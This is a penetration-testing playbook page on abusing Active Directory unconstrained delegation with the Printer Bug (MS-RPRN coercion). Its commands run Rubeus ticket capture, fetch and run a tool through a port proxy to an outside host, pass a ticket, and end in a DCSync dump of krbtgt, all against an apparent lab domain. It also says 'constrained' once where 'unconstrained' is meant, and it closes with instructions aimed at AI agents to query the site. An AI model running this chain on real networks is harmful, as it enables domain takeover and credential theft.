# Unconstrained Delegation ## Unconstrained Delegation & Printer Bug * **What it is**: A configuration where a service account can impersonate any user to any service after authentication. * **How it works**: When a user authenticates to a service (e.g., a web server) with unconstrained delegation, their credentials are cached on that service. This allows the service to request access to other resources on behalf of the user. * **Security Risk**: If an attacker compromises a service account with unconstrained delegation, they can impersonate any user, including domain admins, to access other services and resources within the domain. **How do we trick a high priv user to authenticate to a machine with Unconstrained Delegation?** #### Printer Bug: 1. **What it is**: An attack that exploits the way Windows handles printer requests, allowing an attacker to coerce a domain controller to authenticate to a machine controlled by the attacker. 2. **How it works**: * An attacker sends a printer request to a domain controller. * The domain controller responds by authenticating to the attacker-controlled machine using the machine's account credentials. 3. **Security Risk**: When combined with unconstrained delegation, this allows the attacker to capture the domain controller’s credentials. With these credentials, they can perform actions as the domain controller, leading to full domain compromise. #### Exploitation Flow: 1. **Compromise a machine with unconstrained delegation**: * The attacker identifies and compromises a service account or machine with constrained delegation enabled. 2. **Trigger the Printer Bug**: * The attacker uses the Printer Bug to force a domain controller to authenticate to their controlled machine. 3. **Capture the credentials**: * The domain controller's credentials are cached on the compromised machine due to unconstrained delegation. 4. **Impersonate the domain controller**: * With the captured credentials, the attacker can now impersonate the domain controller and perform actions across the domain. {% code overflow="wrap" %} ```powershell #Find servers with unconstrained delegation: C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat . C:\AD\Tools\PowerView.ps1 Get-DomainComputer -Unconstrained | select -ExpandProperty name # Check if any of the servers with unconstrained delegation have local admin access to the machine. # To do that, first get a new process to find if the user has admin access on the user with unconstrained delegation. C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:appadmin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1 Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local # If the user has local admin privs, trick high priv user to connect to a machine and exploit using printer bug. # Copy Loader echo F | xcopy C:\AD\Tools\Loader.exe \\dcorpappsrv\C$\Users\Public\Loader.exe /Y winrs -r:dcorp-appsrv cmd netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72 ArgSplit "monitor" C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args %Pwn% /targetuser:DCORP-DC$ /interval:5 /nowrap # Force auth using MS-RPRN C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local # Rubeus captures the base64 Ticket # Use PassTheTicket to import ticket C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /ticket:adada # Once ticket is imported, use DCSync to dump secrets C:\AD\Tools>Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:dcorp\krbtgt" "exit" ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/kerberos-delegation/unconstrained-delegation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.